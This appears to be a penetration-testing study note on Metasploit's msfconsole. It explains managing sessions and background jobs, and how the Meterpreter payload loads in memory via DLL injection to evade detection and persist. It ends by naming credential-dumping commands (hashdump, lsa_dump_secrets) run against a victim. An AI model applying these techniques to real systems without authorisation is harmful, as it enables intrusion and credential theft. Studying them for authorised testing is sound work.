☑️MSF Sessions

Sessions

MSFconsole can manage multiple modules at the same time. This is one of the many reasons it provides the user with so much flexibility. This is done with the use of Sessions, which creates dedicated control interfaces for all of your deployed modules.

We can send a session into background with command background or just pressing CTRL+Z.

We can list all the active sessions with the command session. And then we can use command session -i <no.> to get back to a session.

Jobs

If, for example, we are running an active exploit under a specific port and need this port for a different module, we cannot simply terminate the session using [CTRL] + [C]. If we did that, we would see that the port would still be in use, affecting our use of the new module. So instead, we would need to use the jobs command to look at the currently active tasks running in the background and terminate the old ones to free up the port.

Other types of tasks inside sessions can also be converted into jobs to run in the background seamlessly, even if the session dies or disappears.

When we run an exploit, we can run it as a job by typing exploit -j. Per the help menu for the exploit command, adding -j to our command. Instead of just exploit or run, will "run it in the context of a job."

Then use command jobs -l to list all jobs and jobs -k command to kill a job.

Meterpreter

The Meterpreter Payload is a specific type of multi-faceted, extensible Payload that uses DLL injection to ensure the connection to the victim host is stable and difficult to detect using simple checks and can be configured to be persistent across reboots or system changes. Furthermore, Meterpreter resides entirely in the memory of the remote host and leaves no traces on the hard drive, making it difficult to detect with conventional forensic techniques.

When the exploit is completed, the following events occur:

• The target executes the initial stager. This is usually a bind, reverse, findtag, passivex, etc.

• The stager loads the DLL prefixed with Reflective. The Reflective stub handles the loading/injection of the DLL.

• The Meterpreter core initializes, establishes an AES-encrypted link over the socket, and sends a GET. Metasploit receives this GET and configures the client.

• Lastly, Meterpreter loads extensions. It will always load stdapi and load priv if the module gives administrative rights. All of these extensions are loaded over AES encryption.

Whenever the Meterpreter Payload is sent and run on the target system, we receive a Meterpreter shell.

Once in we can set the current session to background and we can run other post modules and exploits. We can use command set SESSION <no.> to connect our session with the newly running exploit that can be used for example in privilege escalation.

We can also run hashdump to dump hashed credentials from the victim computer.

We can use lsa_dump_secrets